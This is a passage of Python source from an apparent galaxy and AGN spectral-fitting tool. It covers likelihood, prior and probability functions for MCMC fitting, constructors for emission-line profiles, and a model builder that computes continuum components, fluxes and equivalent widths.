# if np.isfinite(sigma_resid):
# ax_upp += 3.0 * sigma_resid
minimum = [np.nanmin(comp_dict[comp][np.where(np.isfinite(comp_dict[comp]))[0]]) for comp in comp_dict
if comp_dict[comp][np.isfinite(comp_dict[comp])[0]].size > 0]
if len(minimum) > 0:
minimum = np.nanmin(minimum)
else:
minimum = 0.0
ax1.set_ylim(np.nanmin([0.0,minimum]),ax_upp)
ax1.set_xlim(np.min(lam_gal),np.max(lam_gal))
ax2.set_ylim(ax_low,ax_upp)
ax2.set_xlim(np.min(lam_gal),np.max(lam_gal))
# Axes labels
ax2.set_yticklabels(np.round(np.array(ax2.get_yticks()/3.0)))
ax2.set_ylabel(r'$\Delta f_\lambda$',fontsize=12)
ax2.set_xlabel(r'Wavelength, $\lambda\;(\mathrm{\AA})$',fontsize=12)
handles, labels = ax1.get_legend_handles_labels()
by_label = dict(zip(labels, handles))
ax1.legend(by_label.values(), by_label.keys(),loc='upper right',fontsize=8)
ax2.legend(loc='upper right',fontsize=8)
# Emission line annotations
# Gather up emission line center wavelengths and labels (if available, removing any duplicates)
line_labels = []
for line in line_list:
if "label" in line_list[line]:
line_labels.append([line,line_list[line]["label"]])
line_labels = set(map(tuple, line_labels))
for label in line_labels:
center = line_list[label[0]]["center"]
if (line_list[label[0]]["voff"]=="free"):
voff = p[label[0]+"_VOFF"]
elif (line_list[label[0]]["voff"]!="free"):
voff = ne.evaluate(line_list[label[0]]["voff"],local_dict = p).item()
xloc = calc_new_center(center,voff)
offset_factor = 0.05
yloc = np.max([comp_dict["DATA"][find_nearest(lam_gal,xloc)[1]],comp_dict["MODEL"][find_nearest(lam_gal,xloc)[1]]])+(offset_factor*np.max(comp_dict["DATA"]))
ax1.annotate(label[1], xy=(xloc, yloc), xycoords='data',
xytext=(xloc, yloc), textcoords='data',
horizontalalignment='center', verticalalignment='bottom',
color='xkcd:white',fontsize=6,
)
# Title
ax1.set_title(str(run_dir.name),fontsize=12)
# Save figure
plt.savefig(run_dir.joinpath('max_likelihood_fit.pdf'))
# Close plot
fig.clear()
plt.close()
return sigma_resid, sigma_noise
##################################################################################
#### Likelihood Penalization for Gauss-Hermite Line Profiles #####################
def gh_penalty_ftn(line,params,param_names):
# Reconstruct a gaussian of the same amp, fwhm, and voff
p = dict(zip(param_names, params))
#
gh_pnames = [i for i in param_names if i.startswith(line+"_H")]
if len(gh_pnames)==0:
return 0 # no penalty
elif len(gh_pnames)>0:
D = np.sum(p[i]**2 for i in gh_pnames)
penalty = D
#
return penalty
#### Likelihood function #########################################################
# Maximum Likelihood (initial fitting), Prior, and log Probability functions
def lnlike(params,
param_names,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model):
"""
Log-likelihood function.
"""
# Create model
if (fit_type=='final') and (output_model==False):
model, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob = fit_model(params,
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
if fit_stat=="ML":
# Calculate log-likelihood
l = -0.5*(galaxy[fit_mask]-model[fit_mask])**2/(noise[fit_mask])**2
l = np.sum(l,axis=0)
elif fit_stat=="OLS":
# Since emcee looks for the maximum, but Least Squares requires a minimum
# we multiply by negative.
l = (galaxy[fit_mask]-model[fit_mask])**2
l = -np.sum(l,axis=0)
elif fit_stat=="RMSE":
# Root-Mean Squared Error
l = (galaxy[fit_mask]-model[fit_mask])**2
l = -np.sqrt(np.sum(l,axis=0)/(len(galaxy[fit_mask])-1))
elif (fit_stat=="RCHI2"):
pdict = {p:params[i] for i,p in enumerate(param_names)}
noise_scale = pdict["NOISE_SCALE"]
# Calculate log-likelihood
l = -0.5*np.sum( (galaxy[fit_mask]-model[fit_mask])**2/(noise_scale*noise[fit_mask])**2 + np.log(2*np.pi*(noise_scale*noise[fit_mask])**2),axis=0)
# Determine if any Gauss-Hermite lines exist
pen = 0 # accumulating penalty
if np.isfinite(l):
for line in line_list:
if ((line_list[line]["line_profile"]=="GH")):
penalty = gh_penalty_ftn(line,params,param_names)
pen+= penalty
return l + l*pen, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob
else:
# The maximum likelihood routine [by default] minimizes the negative likelihood
# Thus for fit_stat="OLS", the SSR must be multiplied by -1 to minimize it.
model, comp_dict = fit_model(params,
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
if fit_stat=="ML":
# Calculate log-likelihood
l = -0.5*(galaxy[fit_mask]-model[fit_mask])**2/(noise[fit_mask])**2
l = np.sum(l,axis=0)
# print("Log-Likelihood = %0.4f" % (l))
elif fit_stat=="OLS":
l = (galaxy[fit_mask]-model[fit_mask])**2
l = -np.sum(l,axis=0)
elif fit_stat=="RMSE":
# Root-Mean Squared Error
l = (galaxy[fit_mask]-model[fit_mask])**2
l = -np.sqrt(np.sum(l,axis=0)/(len(galaxy[fit_mask])-1))
elif (fit_stat=="RCHI2"):
pdict = {p:params[i] for i,p in enumerate(param_names)}
noise_scale = pdict["NOISE_SCALE"]
# Calculate log-likelihood
l = -0.5*np.sum( (galaxy[fit_mask]-model[fit_mask])**2/(noise_scale*noise[fit_mask])**2 + np.log(2*np.pi*(noise_scale*noise[fit_mask])**2),axis=0)
# Determine if any Gauss-Hermite lines exist
pen = 0 # accumulating penalty
if np.isfinite(l):
for line in line_list:
if ((line_list[line]["line_profile"]=="GH")):
penalty = gh_penalty_ftn(line,params,param_names)
pen+= penalty
#
return l + l*pen
##################################################################################
#### Priors ######################################################################
# These priors are the same constraints used for outflow testing and maximum likelihood
# fitting, simply formatted for use by emcee.
# To relax a constraint, simply comment out the condition (*not recommended*).
def lnprior(params,param_names,bounds,soft_cons,comp_options):
"""
Log-prior function.
"""
# Create refereence dictionary for numexpr
pdict = {}
for k in range(0,len(param_names),1):
pdict[param_names[k]] = params[k]
# Loop through parameters
lp_arr = []
for i in range(len(params)):
# if prior_types[i]=="gaussian":
# mu, sigma = bounds[i]
# lp_arr.append(-0.5 * ((params[i] - mu) / sigma)**2 - 0.5 * np.log(sigma**2 * 2 * np.pi))
# elif prior_types[i]=="uniform":
lower, upper = bounds[i]
assert upper > lower
if lower <= params[i] <= upper:
# lp_arr.append(-1 * np.log(upper - lower))
lp_arr.append(0.0)
else:
lp_arr.append(-np.inf)
# Loop through soft constraints
for i in range(len(soft_cons)):
if (ne.evaluate(soft_cons[i][0],local_dict = pdict).item()-ne.evaluate(soft_cons[i][1],local_dict = pdict).item() >= 0):
lp_arr.append(0.0)
else:
lp_arr.append(-np.inf)
return np.sum(lp_arr)
##################################################################################
def lnprob(params,
param_names,
bounds,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
fit_stat,
velscale,
run_dir):
"""
Log-probability function.
"""
# lnprob (params,args)
fit_type = 'final'
output_model = False
ll, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob = lnlike(params,
param_names,
line_list,
combined_line_list,
soft_cons,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model)
lp = lnprior(params,param_names,bounds,soft_cons,comp_options)
if not np.isfinite(lp):
return -np.inf, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob, ll
elif (np.isfinite(lp)==True):
return lp + ll, flux_blob, eqwidth_blob, cont_flux_blob, int_vel_disp_blob, ll
####################################################################################
def line_constructor(lam_gal,free_dict,comp_dict,comp_options,line,line_list,velscale,noise):
"""
Constructs an emission line given a line_list, and returns an updated component
dictionary that includes the generated line.
"""
# Gaussian
if (line_list[line]["line_profile"]=="G"): # Gaussian line profile
#
if (isinstance(line_list[line]["amp"],(str))) and (line_list[line]["amp"]!="free"):
amp = ne.evaluate(line_list[line]["amp"],local_dict = free_dict).item()
else:
amp = free_dict[line+"_AMP"]
if (isinstance(line_list[line]["fwhm"],(str))) and (line_list[line]["fwhm"]!="free"):
fwhm = ne.evaluate(line_list[line]["fwhm"],local_dict = free_dict).item()
else:
fwhm = free_dict[line+"_FWHM"]
if (isinstance(line_list[line]["voff"],(str))) and (line_list[line]["voff"]!="free"):
voff = ne.evaluate(line_list[line]["voff"],local_dict = free_dict).item()
else:
voff = free_dict[line+"_VOFF"]
if ~np.isfinite(amp) : amp = 0.0
if ~np.isfinite(fwhm): fwhm = 100.0
if ~np.isfinite(voff): voff = 0.0
line_model = gaussian_line_profile(lam_gal,
line_list[line]["center"],
amp,
fwhm,
voff,
line_list[line]["center_pix"],
line_list[line]["fwhm_res_kms"],
velscale
)
line_model[~np.isfinite(line_model)] = 0.0
comp_dict[line] = line_model
elif (line_list[line]["line_profile"]=="L"): # Lorentzian line profile
if (isinstance(line_list[line]["amp"],(str))) and (line_list[line]["amp"]!="free"):
amp = ne.evaluate(line_list[line]["amp"],local_dict = free_dict).item()
else:
amp = free_dict[line+"_AMP"]
if (isinstance(line_list[line]["fwhm"],(str))) and (line_list[line]["fwhm"]!="free"):
fwhm = ne.evaluate(line_list[line]["fwhm"],local_dict = free_dict).item()
else:
fwhm = free_dict[line+"_FWHM"]
if (isinstance(line_list[line]["voff"],(str))) and (line_list[line]["voff"]!="free"):
voff = ne.evaluate(line_list[line]["voff"],local_dict = free_dict).item()
else:
voff = free_dict[line+"_VOFF"]
if ~np.isfinite(amp) : amp = 0.0
if ~np.isfinite(fwhm): fwhm = 100.0
if ~np.isfinite(voff): voff = 0.0
line_model = lorentzian_line_profile(lam_gal,
line_list[line]["center"],
amp,
fwhm,
voff,
line_list[line]["center_pix"],
line_list[line]["fwhm_res_kms"],
velscale,
noise
)
line_model[~np.isfinite(line_model)] = 0.0
comp_dict[line] = line_model
elif (line_list[line]["line_profile"]=="GH"): # Gauss-Hermite line profile
if (isinstance(line_list[line]["amp"],(str))) and (line_list[line]["amp"]!="free"):
amp = ne.evaluate(line_list[line]["amp"],local_dict = free_dict).item()
else:
amp = free_dict[line+"_AMP"]
if (isinstance(line_list[line]["fwhm"],(str))) and (line_list[line]["fwhm"]!="free"):
fwhm = ne.evaluate(line_list[line]["fwhm"],local_dict = free_dict).item()
else:
fwhm = free_dict[line+"_FWHM"]
if (isinstance(line_list[line]["voff"],(str))) and (line_list[line]["voff"]!="free"):
voff = ne.evaluate(line_list[line]["voff"],local_dict = free_dict).item()
else:
voff = free_dict[line+"_VOFF"]
hmoments = np.empty(comp_options["n_moments"]-2)
if (comp_options["n_moments"]>2):
for i,m in enumerate(range(3,3+(comp_options["n_moments"]-2),1)):
if (isinstance(line_list[line]["h"+str(m)],(str))) and (line_list[line]["h"+str(m)]!="free"):
hl = ne.evaluate(line_list[line]["h"+str(m)],local_dict = free_dict).item()
else:
hl = free_dict[line+"_H"+str(m)]
hmoments[i]=hl
else:
hmoments = None
if ~np.isfinite(amp) : amp = 0.0
if ~np.isfinite(fwhm): fwhm = 100.0
if ~np.isfinite(voff): voff = 0.0
line_model = gauss_hermite_line_profile(lam_gal,
line_list[line]["center"],
amp,
fwhm,
voff,
hmoments,
line_list[line]["center_pix"],
line_list[line]["fwhm_res_kms"],
velscale,
noise
)
line_model[~np.isfinite(line_model)] = 0.0
comp_dict[line] = line_model
elif (line_list[line]["line_profile"]=="V"): # Voigt line profile
if (isinstance(line_list[line]["amp"],(str))) and (line_list[line]["amp"]!="free"):
amp = ne.evaluate(line_list[line]["amp"],local_dict = free_dict).item()
else:
amp = free_dict[line+"_AMP"]
if (isinstance(line_list[line]["fwhm"],(str))) and (line_list[line]["fwhm"]!="free"):
fwhm = ne.evaluate(line_list[line]["fwhm"],local_dict = free_dict).item()
else:
fwhm = free_dict[line+"_FWHM"]
if (isinstance(line_list[line]["voff"],(str))) and (line_list[line]["voff"]!="free"):
voff = ne.evaluate(line_list[line]["voff"],local_dict = free_dict).item()
else:
voff = free_dict[line+"_VOFF"]
if (isinstance(line_list[line]["shape"],(str))) and (line_list[line]["shape"]!="free"):
shape = ne.evaluate(line_list[line]["shape"],local_dict = free_dict).item()
else:
shape = free_dict[line+"_SHAPE"]
if ~np.isfinite(amp) : amp = 0.0
if ~np.isfinite(fwhm): fwhm = 100.0
if ~np.isfinite(voff): voff = 0.0
line_model = voigt_line_profile(lam_gal,
line_list[line]["center"],
amp,
fwhm,
voff,
shape,
line_list[line]["center_pix"],
line_list[line]["fwhm_res_kms"],
velscale,
noise
)
line_model[~np.isfinite(line_model)] = 0.0
comp_dict[line] = line_model
return comp_dict
#### Model Function ##############################################################
def combined_fwhm(lam_gal, full_profile, fwhm_res, velscale ):
"""
Calculate fwhm of combined lines.
"""
def lin_interp(x, y, i, half):
return x[i] + (x[i+1] - x[i]) * ((half - y[i]) / (y[i+1] - y[i]))
def half_max_x(x, y):
half = max(y)/2.0
signs = np.sign(np.add(y, -half))
zero_crossings = (signs[0:-2] != signs[1:-1])
zero_crossings_i = np.where(zero_crossings)[0]
if len(zero_crossings_i)==2:
return [lin_interp(x, y, zero_crossings_i[0], half),
lin_interp(x, y, zero_crossings_i[1], half)]
else:
return [0.0, 0.0]
hmx = half_max_x(range(len(lam_gal)),full_profile)
fwhm = np.abs(hmx[1]-hmx[0])
fwhm = np.sqrt((fwhm*velscale)**2 - fwhm_res**2)
if ~np.isfinite(fwhm):
fwhm = 0.0
return fwhm
def fit_model(params,
param_names,
line_list,
combined_line_list,
lam_gal,
galaxy,
noise,
comp_options,
losvd_options,
host_options,
power_options,
poly_options,
opt_feii_options,
uv_iron_options,
balmer_options,
outflow_test_options,
host_template,
opt_feii_templates,
uv_iron_template,
balmer_template,
stel_templates,
fwhm_gal,
fit_mask,
velscale,
run_dir,
fit_type,
fit_stat,
output_model):
"""
Constructs galaxy model.
"""
# Construct dictionary of parameter names and their respective parameter values
# param_names = [param_dict[key]['name'] for key in param_dict ]
# params = [param_dict[key]['init'] for key in param_dict ]
keys = param_names
values = params
p = dict(zip(keys, values))
c = 299792.458 # speed of light
host_model = np.copy(galaxy)
# Initialize empty dict to store model components
comp_dict = {}
############################# Power-law Component ######################################################
if (comp_options['fit_power']==True) & (power_options['type']=='simple'):
# Create a template model for the power-law continuum
# power = simple_power_law(lam_gal,p['POWER_AMP'],p['POWER_SLOPE'],p['POWER_BREAK']) #
power = simple_power_law(lam_gal,p['POWER_AMP'],p['POWER_SLOPE']) #
host_model = (host_model) - (power) # Subtract off continuum from galaxy, since we only want template weights to be fit
comp_dict['POWER'] = power
elif (comp_options['fit_power']==True) & (power_options['type']=='broken'):
# Create a template model for the power-law continuum
# power = simple_power_law(lam_gal,p['POWER_AMP'],p['POWER_SLOPE'],p['POWER_BREAK']) #
power = broken_power_law(lam_gal,p['POWER_AMP'],p['POWER_BREAK'],
p['POWER_SLOPE_1'],p['POWER_SLOPE_2'],
p['POWER_CURVATURE'])
host_model = (host_model) - (power) # Subtract off continuum from galaxy, since we only want template weights to be fit
comp_dict['POWER'] = power
########################################################################################################
############################# Polynomial Components ####################################################
if (comp_options["fit_poly"]==True) & (poly_options["ppoly"]["bool"]==True) & (poly_options["ppoly"]["order"]>=0):
#
nw = np.linspace(-1,1,len(lam_gal))
coeff = np.empty(poly_options['ppoly']['order']+1)
for n in range(poly_options['ppoly']['order']+1):
coeff[n] = p["PPOLY_COEFF_%d" % n]
ppoly = np.polynomial.polynomial.polyval(nw, coeff)
if np.any(ppoly)<0:
ppoly += -np.nanmin(ppoly)
comp_dict["PPOLY"] = ppoly
host_model += ppoly
#
if (comp_options["fit_poly"]==True) & (poly_options["apoly"]["bool"]==True) & (poly_options["apoly"]["order"]>=0):
#
nw = np.linspace(-1,1,len(lam_gal))
coeff = np.empty(poly_options['apoly']['order']+1)
for n in range(poly_options['apoly']['order']+1):
coeff[n] = p["APOLY_COEFF_%d" % n]
apoly = np.polynomial.legendre.legval(nw, coeff)
comp_dict["APOLY"] = apoly
host_model += apoly
#
if (comp_options["fit_poly"]==True) & (poly_options["mpoly"]["bool"]==True) & (poly_options["mpoly"]["order"]>=0):
#
nw = np.linspace(-1,1,len(lam_gal))
coeff = np.empty(poly_options['mpoly']['order']+1)
for n in range(poly_options['mpoly']['order']+1):
coeff[n] = p["MPOLY_COEFF_%d" % n]
mpoly = np.polynomial.legendre.legval(nw, coeff)
comp_dict["MPOLY"] = mpoly
host_model *= mpoly
#
########################################################################################################
############################# Optical FeII Component ###################################################
if (opt_feii_templates is not None):
if (opt_feii_options['opt_template']['type']=='VC04'):
br_opt_feii_template, na_opt_feii_template = VC04_opt_feii_template(p, lam_gal, opt_feii_templates, opt_feii_options, velscale)
host_model = (host_model) - (na_opt_feii_template) - (br_opt_feii_template)
comp_dict['NA_OPT_FEII_TEMPLATE'] = na_opt_feii_template # Add to component dictionary
comp_dict['BR_OPT_FEII_TEMPLATE'] = br_opt_feii_template # Add to component dictionary
elif (opt_feii_options['opt_template']['type']=='K10'):
f_template, s_template, g_template, z_template = K10_opt_feii_template(p, lam_gal, opt_feii_templates, opt_feii_options, velscale)
host_model = (host_model) - (f_template) - (s_template) - (g_template) - (z_template)
comp_dict['F_OPT_FEII_TEMPLATE'] = f_template
comp_dict['S_OPT_FEII_TEMPLATE'] = s_template
comp_dict['G_OPT_FEII_TEMPLATE'] = g_template
comp_dict['Z_OPT_FEII_TEMPLATE'] = z_template
########################################################################################################
############################# UV Iron Component ##########################################################
if (uv_iron_template is not None):
uv_iron_template = VW01_uv_iron_template(lam_gal, p, uv_iron_template, uv_iron_options, velscale, run_dir)
host_model = (host_model) - (uv_iron_template)
comp_dict['UV_IRON_TEMPLATE'] = uv_iron_template
########################################################################################################
############################# Balmer Continuum Component ###############################################
if (balmer_template is not None):
# Unpack Balmer template
lam_balmer, spec_high_balmer, velscale_balmer = balmer_template
# Parse Balmer options
if (balmer_options['R_const']['bool']==False):
balmer_ratio = p['BALMER_RATIO']
elif (balmer_options['R_const']['bool']==True):
balmer_ratio = balmer_options['R_const']['R_val']
if (balmer_options['balmer_amp_const']['bool']==False):
balmer_amp = p['BALMER_AMP']
elif (balmer_options['balmer_amp_const']['bool']==True):
balmer_amp = balmer_options['balmer_amp_const']['balmer_amp_val']
if (balmer_options['balmer_fwhm_const']['bool']==False):
balmer_fwhm = p['BALMER_FWHM']
elif (balmer_options['balmer_fwhm_const']['bool']==True):
balmer_fwhm = balmer_options['balmer_fwhm_const']['balmer_fwhm_val']
if (balmer_options['balmer_voff_const']['bool']==False):
balmer_voff = p['BALMER_VOFF']
elif (balmer_options['balmer_voff_const']['bool']==True):
balmer_voff = balmer_options['balmer_voff_const']['balmer_voff_val']
if (balmer_options['Teff_const']['bool']==False):
balmer_Teff = p['BALMER_TEFF']
elif (balmer_options['Teff_const']['bool']==True):
balmer_Teff = balmer_options['Teff_const']['Teff_val']
if (balmer_options['tau_const']['bool']==False):
balmer_tau = p['BALMER_TAU']
elif (balmer_options['tau_const']['bool']==True):
balmer_tau = balmer_options['tau_const']['tau_val']
balmer_cont = generate_balmer_continuum(lam_gal,lam_balmer, spec_high_balmer, velscale_balmer,
balmer_ratio, balmer_amp, balmer_fwhm, balmer_voff, balmer_Teff, balmer_tau)
host_model = (host_model) - (balmer_cont)
comp_dict['BALMER_CONT'] = balmer_cont
########################################################################################################
############################# Emission Line Components #################################################
# Iteratively generate lines from the line list using the line_constructor()
for line in line_list:
comp_dict = line_constructor(lam_gal,p,comp_dict,comp_options,line,line_list,velscale,noise)
host_model = host_model - comp_dict[line]
########################################################################################################
############################# Host-galaxy Component ######################################################
if (comp_options["fit_host"]==True):
#
if (host_options["vel_const"]["bool"]==True) & (host_options["disp_const"]["bool"]==True):
# If both velocity and dispersion are constant, the host template(s) are pre-convolved
# and the only thing left to do is to scale (or perform nnls for multiple templates)
conv_host = host_template
#
if np.shape(conv_host)[1]==1:
# conv_host = conv_host/np.median(conv_host) * p["HOST_TEMP_AMP"]
conv_host = conv_host * p["HOST_TEMP_AMP"]
host_galaxy = conv_host.reshape(-1)
elif np.shape(conv_host)[1]>1:
host_model[~np.isfinite(host_model)] = 0
conv_host[~np.isfinite(conv_host)] = 0
# host_norm = np.median(host_model)
# if (host_norm/host_norm!=1):
# host_norm = 1
weights = nnls(conv_host,host_model)#/host_norm) # scipy.optimize Non-negative Least Squares
host_galaxy = (np.sum(weights*conv_host,axis=1)) #* host_norm
#
elif (host_options["vel_const"]["bool"]==False) | (host_options["disp_const"]["bool"]==False):
# If templates velocity OR dispersion are not constant, we need to perform
# the convolution.
ssp_fft, npad, vsyst = host_template
if host_options["vel_const"]["bool"]==False:
host_vel = p["HOST_TEMP_VEL"]
elif host_options["vel_const"]["bool"]==True:
host_vel = host_options["vel_const"]["val"]
#
if host_options["disp_const"]["bool"]==False:
host_disp = p["HOST_TEMP_DISP"]
elif host_options["disp_const"]["bool"]==True:
host_disp = host_options["disp_const"]["val"]
#
conv_host = convolve_gauss_hermite(ssp_fft,npad,float(velscale),\
[host_vel, host_disp],np.shape(lam_gal)[0],velscale_ratio=1,sigma_diff=0,vsyst=vsyst)
#
if np.shape(conv_host)[1]==1:
# conv_host = conv_host/np.median(conv_host) * p["HOST_TEMP_AMP"]
conv_host = conv_host * p["HOST_TEMP_AMP"]
host_galaxy = conv_host.reshape(-1)
# elif np.shape(conv_host)[1]>1:
host_model[~np.isfinite(host_model)] = 0
conv_host[~np.isfinite(conv_host)] = 0
# host_norm = np.median(host_model)
# if (host_norm/host_norm!=1):
# host_norm = 1
weights = nnls(conv_host,host_model)#/host_norm) # scipy.optimize Non-negative Least Squares
host_galaxy = (np.sum(weights*conv_host,axis=1))# * host_norm
host_model = (host_model) - (host_galaxy) # Subtract off continuum from galaxy, since we only want template weights to be fit
comp_dict['HOST_GALAXY'] = host_galaxy
########################################################################################################
############################# LOSVD Component ####################################################
if (comp_options["fit_losvd"]==True):
#
if (losvd_options["vel_const"]["bool"]==True) & (losvd_options["disp_const"]["bool"]==True):
# If both velocity and dispersion are constant, the host template(s) are pre-convolved
# and the only thing left to do is to scale (or perform nnls for multiple templates)
conv_temp = stel_templates
# print(np.shape(conv_temp))
# print(np.shape(host_model))
#
host_model[~np.isfinite(host_model)] = 0
conv_temp[~np.isfinite(conv_temp)] = 0
# host_norm = np.median(host_model)
# if (host_norm/host_norm!=1) or (host_norm<1):
# host_norm = 1
weights = nnls(conv_temp,host_model)#/host_norm) # scipy.optimize Non-negative Least Squares
host_galaxy = (np.sum(weights*conv_temp,axis=1)) #* host_norm
# Final scaling to ensure the host galaxy isn't negative anywhere
if np.any(host_galaxy<0):
host_galaxy+= -np.min(host_galaxy)
elif (losvd_options["vel_const"]["bool"]==False) | (losvd_options["disp_const"]["bool"]==False):
# If templates velocity OR dispersion are not constant, we need to perform
# the convolution.
temp_fft, npad, vsyst = stel_templates
if losvd_options["vel_const"]["bool"]==False:
stel_vel = p["STEL_VEL"]
elif losvd_options["vel_const"]["bool"]==True:
stel_vel = losvd_options["vel_const"]["val"]
#
if losvd_options["disp_const"]["bool"]==False:
stel_disp = p["STEL_DISP"]
elif losvd_options["disp_const"]["bool"]==True:
stel_disp = losvd_options["disp_const"]["val"]
#
conv_temp = convolve_gauss_hermite(temp_fft,npad,float(velscale),\
[stel_vel, stel_disp],np.shape(lam_gal)[0],velscale_ratio=1,sigma_diff=0,vsyst=vsyst)
#
host_model[~np.isfinite(host_model)] = 0
conv_temp[~np.isfinite(conv_temp)] = 0
# host_norm = np.median(host_model)
# if (host_norm/host_norm!=1) or (host_norm<1):
# host_norm = 1
weights = nnls(conv_temp,host_model)#/host_norm) # scipy.optimize Non-negative Least Squares
host_galaxy = (np.sum(weights*conv_temp,axis=1)) #* host_norm
#
if np.any(host_galaxy<0):
host_galaxy+= -np.min(host_galaxy)
host_model = (host_model) - (host_galaxy) # Subtract off continuum from galaxy, since we only want template weights to be fit
comp_dict['HOST_GALAXY'] = host_galaxy
########################################################################################################
# The final model
gmodel = np.sum((comp_dict[d] for d in comp_dict),axis=0)
#########################################################################################################
# Add combined lines to comp_dict
for comb_line in combined_line_list:
comp_dict[comb_line] = np.zeros(len(lam_gal))
for indiv_line in combined_line_list[comb_line]["lines"]:
comp_dict[comb_line]+=comp_dict[indiv_line]
line_list = {**line_list, **combined_line_list}
#########################################################################################################
# Add last components to comp_dict for plotting purposes
# Add galaxy, sigma, model, and residuals to comp_dict
comp_dict["DATA"] = galaxy
comp_dict["WAVE"] = lam_gal
comp_dict["NOISE"] = noise
comp_dict["MODEL"] = gmodel
comp_dict["RESID"] = galaxy-gmodel
########################## Fluxes & Equivalent Widths ###################################################
# Equivalent widths of emission lines are stored in a dictionary and returned to emcee as metadata blob.
# Velocity interpolation function
interp_ftn = interp1d(lam_gal,np.arange(len(lam_gal))*velscale,bounds_error=False)
if (fit_type=='final') and (output_model==False):
# Create a single continuum component based on what was fit
total_cont = np.zeros(len(lam_gal))
agn_cont = np.zeros(len(lam_gal))
host_cont = np.zeros(len(lam_gal))
for key in comp_dict:
if key in ["POWER","HOST_GALAXY","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
total_cont+=comp_dict[key]
if key in ["POWER","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]:
agn_cont+=comp_dict[key]
if key in ["HOST_GALAXY", "PPOLY", "APOLY", "MPOLY"]:
host_cont+=comp_dict[key]
# Get all spectral components, not including data, model, resid, and noise
spec_comps = [i for i in comp_dict if i not in ["DATA","MODEL","WAVE","RESID","NOISE","POWER","HOST_GALAXY","BALMER_CONT", "PPOLY", "APOLY", "MPOLY"]]
# Get keys of any lines that were fit for which we will compute eq. widths for
lines = [line for line in line_list]
fluxes = {}
eqwidths = {}
int_vel_disp = {}
for key in spec_comps:
flux = simps(comp_dict[key],lam_gal)
# add key/value pair to dictionary
fluxes[key+"_FLUX"] = flux
# for line in lines:
if (key in lines):
comp = comp_dict[key]
# if line_list[key]["line_profile"] in ["V","L"]:
# # Truncate the component to zero for any values below the median noise level.
# # This is necessary because the wings of the Voigt and Lorentzian profiles extend to infinity,
# # resulting in unrealistic line dispersions.
# comp[comp < np.nanmedian(noise)] = 0
eqwidth = simps(comp/total_cont,lam_gal)
else:
eqwidth = simps(comp_dict[key]/total_cont,lam_gal)
if ~np.isfinite(eqwidth):
eqwidth=0.0
# Add to eqwidth_dict
eqwidths[key+"_EW"] = eqwidth
#
if (key in lines):
# Calculate integrated velocities and dispersions for each line
# Calculate velocity scale centered on line
vel = np.arange(len(lam_gal))*velscale - interp_ftn(line_list[key]["center"])
full_profile = comp_dict[key]
# Remove stray lines
full_profile = remove_stray_lines(full_profile)
# Normalized line profile
norm_profile = full_profile/np.sum(full_profile)
# Calculate integrated velocity in pixels units
v_int = simps(vel*norm_profile,vel)/simps(norm_profile,vel)
# Calculate integrated dispersion and correct for instrumental dispersion
d_int = np.sqrt(simps(vel**2*norm_profile,vel)/simps(norm_profile,vel) - (v_int**2))
d_int = np.sqrt(d_int**2 - (line_list[key]["fwhm_res_kms"]/2.3548)**2)
if ~np.isfinite(d_int): d_int = 0.0
if ~np.isfinite(v_int): v_int = 0.0
int_vel_disp[key+"_DISP"] = d_int
int_vel_disp[key+"_VINT"] = v_int
# Calculate integrated FWHM for combined lines
if (key in combined_line_list):
comb_fwhm = combined_fwhm(lam_gal,comp_dict[key],line_list[key]["fwhm_res_kms"],velscale)
int_vel_disp[key+"_FWHM"] = comb_fwhm
# Continuum fluxes (to obtain continuum luminosities)
cont_fluxes = {}
#
interp_tot = interp1d(lam_gal,total_cont,kind='linear',bounds_error=False,fill_value=0.0)
interp_agn = interp1d(lam_gal,agn_cont ,kind='linear',bounds_error=False,fill_value=0.0)
interp_host = interp1d(lam_gal,host_cont ,kind='linear',bounds_error=False,fill_value=0.0)
if (lam_gal[0]<1350) & (lam_gal[-1]>1350):
cont_fluxes["F_CONT_TOT_1350"] = interp_tot(1350.0) #total_cont[find_nearest(lam_gal,1350.0)[1]]#
cont_fluxes["F_CONT_AGN_1350"] = interp_agn(1350.0) #agn_cont[find_nearest(lam_gal,1350.0)[1]] #
cont_fluxes["F_CONT_HOST_1350"] = interp_host(1350.0) #host_cont[find_nearest(lam_gal,1350.0)[1]] #
if (lam_gal[0]<3000) & (lam_gal[-1]>3000):
cont_fluxes["F_CONT_TOT_3000"] = interp_tot(3000.0) #total_cont[find_nearest(lam_gal,3000.0)[1]]
cont_fluxes["F_CONT_AGN_3000"] = interp_agn(3000.0) #agn_cont[find_nearest(lam_gal,3000.0)[1]]
cont_fluxes["F_CONT_HOST_3000"] = interp_host(3000.0) #host_cont[find_nearest(lam_gal,3000.0)[1]]
